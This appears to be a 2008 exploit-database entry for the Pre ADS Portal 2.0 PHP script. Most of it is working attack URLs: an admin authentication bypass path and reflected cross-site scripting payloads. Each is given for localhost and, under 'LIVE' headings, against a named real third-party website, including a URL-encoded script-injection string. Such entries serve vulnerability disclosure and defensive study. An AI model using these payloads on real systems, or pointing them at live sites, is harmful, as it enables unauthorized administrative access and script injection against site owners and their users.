Pre ADS Portal 2.0 - Authentication Bypass / Cross-Site Scripting
Author: G4N0K
type: webapps
platform: php
port:
date_added: 2008-11-05
date_updated: 2016-12-06
verified: 1
codes: OSVDB-53709;CVE-2008-6716;OSVDB-53701;OSVDB-53700;CVE-2008-6715
tags:
aliases:
screenshot_url:
application_url:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
IN THE NAME OF ALLAH
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Pre ADS Portal <= 2.0 Multiple Vulnerabilities
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[~] Script: Pre ADS Portal
[~] Language : PHP
[~] Website[main]: http://www.preproject.com
[~] Website[script]: http://www.preproject.com/ads.asp
[~] Type : Commercial
[~] Report-Date : 05/11/2008
[~] Founder : G4N0K <mail.ganok[at]gmail.com>
===============================================================================
===[ Admin BYpass ]===
[!] http://localhost/[path]/homeadmin/adminhome.php
===[ Admin BYpass-LIVE ]===
http://www.mideastbiz.com/homeadmin/adminhome.php
===[ XSS ]===
[!] http://localhost/[path]/homeadmin/adminhome.php?pg=1&msg=XSS
[!] http://localhost/[path]/homeadmin/signinform.php?msg=XSS
===[ XSS-LIVE ]===
[!]http://www.mideastbiz.com/homeadmin/adminhome.php?pg=1&msg=g4n0k%22%3E%3Cscript%3Ealert('G4N0K')%3C/script%3E
http://www.mideastbiz.com/homeadmin/signinform.php?msg=g4n0k%22%3E%3Cscript%3Ealert('G4N0K')%3C/script%3E
===[ Greetz ]===
[~] ALLAH
[~] Tornado2800 <Tornado2800[at]gmail.com>
[~] Hussain-X <darkangel_g85[at]yahoo.com>
//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
//ALLAH,forgimme...
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
exit(); //EoX
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# milw0rm.com [2008-11-06]